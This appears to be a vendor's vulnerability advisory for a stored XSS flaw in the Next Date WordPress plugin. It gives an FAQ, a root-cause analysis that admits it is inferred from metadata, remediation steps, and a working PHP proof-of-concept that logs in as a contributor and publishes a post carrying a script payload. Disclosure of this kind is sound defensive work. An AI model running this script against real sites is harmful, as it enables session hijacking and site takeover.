What is CVE-2026-4920?

CVE-2026-4920 is a stored cross-site scripting (XSS) vulnerability in the Next Date plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘default’ shortcode attribute, which execute when other users view the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of the ‘default’ shortcode attribute. An attacker can create or edit a post with a malicious payload in the shortcode, leading to script execution in the context of the site when the page is viewed by others.

Who is affected by this vulnerability?

All WordPress installations using the Next Date plugin version 1.0 or earlier are affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Next Date plugin installed. If it is version 1.0 or earlier, your site is at risk. Additionally, review any posts or pages that use the ‘nextdate’ shortcode for suspicious content.

What should I do to fix this vulnerability?

Currently, there is no patched version of the Next Date plugin available. It is recommended to temporarily disable the plugin or replace it with an alternative. Additionally, ensure that contributor roles are restricted and consider using a Web Application Firewall (WAF) to filter potential XSS payloads.

What does the CVSS score of 6.4 mean?

The CVSS score of 6.4 indicates a medium severity vulnerability. This suggests that while the risk is not critical, successful exploitation can lead to significant impacts, such as session hijacking or unauthorized actions on behalf of users.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to stored XSS, allowing attackers to steal session cookies, redirect users, or perform actions as other users, including administrators. The stored nature of the XSS means it can affect all users who view the compromised content.

How does the proof of concept demonstrate the issue?

The proof of concept demonstrates how an authenticated user can log in and inject a malicious payload into the ‘default’ shortcode. It shows the steps to authenticate and exploit the vulnerability, highlighting the ease of executing the attack without special conditions.

Can this vulnerability be exploited without user interaction?

Yes, the exploitation of this vulnerability does not require user interaction. Once the malicious payload is injected and the post is published, any user who views the affected page will have the script executed in their browser automatically.

What is the recommended action for site administrators?

Site administrators should immediately disable the Next Date plugin or replace it with a secure alternative. They should also review user roles and permissions to limit access to contributor-level users and consider implementing a WAF for additional protection.

What are the long-term implications of this vulnerability?

Long-term implications include the potential for attackers to gain ongoing access to user data and site functionality. If an administrator’s session is hijacked, it could lead to full site compromise, necessitating a thorough security review and potential recovery actions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 11, 2026

CVE-2026-4920: Next Date <= 1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'default' Shortcode Attribute (nextdate)

CVE ID CVE-2026-4920

Plugin nextdate

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4920 (metadata-based):

This vulnerability allows authenticated attackers with contributor-level access or higher to inject arbitrary web scripts into WordPress pages through the Next Date plugin (versions up to and including 1.0). The injected scripts execute whenever a user views the compromised page. Atomic Edge assigns a CVSS score of 6.4 (Medium severity) based on the CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N vector.

Root cause: The plugin fails to sanitize the ‘default’ shortcode attribute before rendering it in the page output. Based on the CWE-79 classification and the description, Atomic Edge infers that the plugin registers a WordPress shortcode (likely via add_shortcode(‘nextdate’, …) in the plugin slug ‘nextdate’) and accepts a ‘default’ parameter. The plugin does not call WordPress sanitization functions (e.g., sanitize_text_field, wp_kses_post) on the attribute value nor does it use proper output escaping (e.g., esc_attr, esc_html) when generating the HTML. Without source code, Atomic Edge cannot confirm these implementation details, but the CWE and description strongly suggest this pattern.

Exploitation: An attacker with a contributor account (or higher) creates or edits a post/page containing the vulnerable shortcode. The attacker supplies a malicious payload in the ‘default’ parameter. The shortcode syntax is [nextdate default=”alert(‘XSS’)”]. The attacker publishes the post. When any user (including administrators) views the post, the browser executes the injected JavaScript. The attack requires no special network conditions (AV:N), has low attack complexity (AC:L), and does not require user interaction for the XSS to trigger (UI:N). The scope is changed (S:C) because the injected script runs in the context of the WordPress site, potentially accessing cookies, session tokens, or performing actions as the victim.

Remediation: Atomic Edge advises plugin authors to sanitize shortcode attributes using WordPress’s built-in functions. For example, apply sanitize_text_field() to the ‘default’ attribute value before storing or outputting it. On output, use esc_attr() when the value appears in HTML attributes, or wp_kses_post() for rich content. Since no patched version is available, site administrators should temporarily disable the Next Date plugin or replace it with an alternative. They should also restrict contributor roles or use a Web Application Firewall (WAF) to filter XSS payloads in shortcode parameters.

Impact: Successful exploitation leads to stored cross-site scripting. An attacker can steal session cookies, redirect users to malicious websites, perform actions on behalf of administrators (e.g., create new admin accounts), or deface WordPress content. The XSS is stored, meaning it persists across visits and affects all users who view the compromised page. The CVSS impact sub-score (C:L/I:L/A:N) reflects limited direct data compromise, but the XSS can escalate to full site compromise if an administrator’s session is hijacked.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4920 - Next Date <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'default' Shortcode Attribute

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress URL
$username = 'contributor';          // WordPress user with at least Contributor role
$password = 'password';             // User password

// Step 1: Authenticate
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_exec($ch);
curl_close($ch);

// Step 2: Create a new post with the vulnerable shortcode
// Use the WordPress REST API to create a post as the authenticated user
$rest_url = $target_url . '/wp-json/wp/v2/posts';

// XSS payload in the 'default' attribute of the nextdate shortcode
$payload = '<script>alert("XSS by Atomic Edge");</script>';
$post_content = '[nextdate default="' . $payload . '"]';

$post_data = array(
    'title' => 'Atomic Edge CVE-2026-4920 PoC',
    'content' => $post_content,
    'status' => 'publish'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 201) {
    echo "[+] Post created successfully with XSS payload.n";
    echo "[+] Visit the new post to trigger the XSS.n";
    $response_data = json_decode($response, true);
    if (isset($response_data['link'])) {
        echo "[+] Post URL: " . $response_data['link'] . "n";
    }
} else {
    echo "[!] Failed to create post. HTTP code: " . $http_code . "n";
    echo "[!] Response: " . $response . "n";
}

Frequently Asked Questions

What is CVE-2026-4920?
Understanding the vulnerability
CVE-2026-4920 is a stored cross-site scripting (XSS) vulnerability in the Next Date plugin for WordPress. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘default’ shortcode attribute, which execute when other users view the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of the ‘default’ shortcode attribute. An attacker can create or edit a post with a malicious payload in the shortcode, leading to script execution in the context of the site when the page is viewed by others.
Who is affected by this vulnerability?
Identifying vulnerable users
All WordPress installations using the Next Date plugin version 1.0 or earlier are affected. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the Next Date plugin installed. If it is version 1.0 or earlier, your site is at risk. Additionally, review any posts or pages that use the ‘nextdate’ shortcode for suspicious content.
What should I do to fix this vulnerability?
Recommended remediation steps
Currently, there is no patched version of the Next Date plugin available. It is recommended to temporarily disable the plugin or replace it with an alternative. Additionally, ensure that contributor roles are restricted and consider using a Web Application Firewall (WAF) to filter potential XSS payloads.
What does the CVSS score of 6.4 mean?
Understanding severity levels
The CVSS score of 6.4 indicates a medium severity vulnerability. This suggests that while the risk is not critical, successful exploitation can lead to significant impacts, such as session hijacking or unauthorized actions on behalf of users.
What are the practical risks of this vulnerability?
Potential impact on your site
Exploitation of this vulnerability can lead to stored XSS, allowing attackers to steal session cookies, redirect users, or perform actions as other users, including administrators. The stored nature of the XSS means it can affect all users who view the compromised content.
How does the proof of concept demonstrate the issue?
Technical illustration of the vulnerability
The proof of concept demonstrates how an authenticated user can log in and inject a malicious payload into the ‘default’ shortcode. It shows the steps to authenticate and exploit the vulnerability, highlighting the ease of executing the attack without special conditions.
Can this vulnerability be exploited without user interaction?
Nature of the attack
Yes, the exploitation of this vulnerability does not require user interaction. Once the malicious payload is injected and the post is published, any user who views the affected page will have the script executed in their browser automatically.
What is the recommended action for site administrators?
Immediate steps to take
Site administrators should immediately disable the Next Date plugin or replace it with a secure alternative. They should also review user roles and permissions to limit access to contributor-level users and consider implementing a WAF for additional protection.
What are the long-term implications of this vulnerability?
Future risks and considerations
Long-term implications include the potential for attackers to gain ongoing access to user data and site functionality. If an administrator’s session is hijacked, it could lead to full site compromise, necessitating a thorough security review and potential recovery actions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations